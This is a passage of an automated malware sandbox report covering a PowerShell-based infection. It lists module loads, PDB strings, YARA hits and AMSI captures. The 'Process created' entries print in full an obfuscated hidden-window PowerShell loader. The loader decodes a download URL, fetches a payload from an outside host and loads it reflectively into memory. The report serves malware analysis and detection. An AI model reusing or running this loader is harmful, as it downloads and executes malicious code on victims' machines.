              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
              Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
              Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
              Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Pegefingeren $Revets $Systemrelation), (Stimuleret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Svingtud = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gaslighting)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Heliophobic, $false).DefineType($unadopted, $
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 
Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
              Source: AppVDllSurrogate.exe.8.dr | Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: MpCmdRun.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x19b52e
              Source: SQLDumper.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x49b60
              Source: AdobeARMHelper.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x64c50
              Source: pj11icon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x142395
              Source: Aut2exe_x64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1c7652
              Source: AppSharingHookController64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x20765
              Source: GoogleUpdateCore.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x47eca
              Source: NisSrv.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x307019
              Source: AppVDllSurrogate.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: pptico.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3f5707
              Source: visicon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2df46c
              Source: dbcicons.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: AppVDllSurrogate64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x4ec22
              Source: UcMapi.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x132706
              Source: osmclienticon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2584f
              Source: outicon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x91610
              Source: msoev.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x268d3
              Source: mpextms.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xee9bf
              Source: lyncicon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xea647
              Source: jaureg.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x95cbf
              Source: GoogleUpdate.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x36547
              Source: OfficeScrSanBroker.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xc392a
              Source: javaw.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x5043b
              Source: OfficeScrBroker.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xa8883
              Source: MsMpEng.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x39d03
              Source: pubs.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1452a5
              Source: Au3Info.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
              Source: aimgr.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3b0de
              Source: GoogleUpdateBroker.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2e9ce
              Source: ai.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xc328b
              Source: Au3Info_x64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x49bdd
              Source: PerfBoost.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x6ed59
              Source: javaws.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x6c99c
              Source: MpCmdRun.exe0.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x146cda
              Source: aimgr.exe0.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2e51b
              Source: Common.DBConnection.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2153c
